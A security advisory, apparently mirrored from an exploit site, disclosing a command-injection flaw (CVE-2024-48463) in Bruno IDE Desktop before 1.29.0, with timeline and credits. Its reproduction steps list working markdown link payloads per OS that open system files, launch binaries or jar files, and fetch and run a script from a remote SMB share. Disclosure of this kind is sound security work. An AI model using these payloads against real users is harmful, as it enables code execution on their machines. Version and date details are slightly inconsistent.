## https://sploitus.com/exploit?id=1337DAY-ID-39874
Bruno IDE Desktop prior to 1.29.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents ]==================================================
Overview
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
References
=====[ Vulnerability Information
]===========================================
Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8
=====[ Overview ]===========================================================
System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Impacts:
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.
=====[ Detailed Description ]===============================================
Command Injection [PoC - Reproduction Steps]:
1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab
3. Insert the following markdown payloads depending on the target OS:
Linux:
[passwd](/etc/passwd)
[smb](smb://localhost/public/x.desktop) - Malicious .desktop file
[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file
POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw
Windows:
[Calc](C:/Windows/system32/calc.exe)
If Java is installed, directly execute a malicious .jar file:
[exploit](http://localhost/pwn.jar)
[exploit](C:/Users/user/Downloads/pwn.jar)
POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI
macOS:
[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.
[calcFile](System/Applications/Calculator.app) - Another method to trigger
Calculator.
[exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
share and executes a script.
[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.
[file](///etc/hosts) - Reads the system’s /etc/hosts file.
[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.
[facetime2](facetime:[email protected]) - Triggers FaceTime using an
email address.
[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.
[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
protocol.
[calendar](calendar://) - Attempts to open a calendar application.
POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY
4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.
=====[ Timeline of Disclosure
]==============================================
14/Set/2024 - Responsible disclosure was initiated with the vendor.
16/Set/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
issue.
24/Out/2024 - CVE-2024-48463 was assigned and reserved.
=====[ Thanks & Acknowledgements ]==========================================
Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discover
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks
=====[ References ]=========================================================
[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463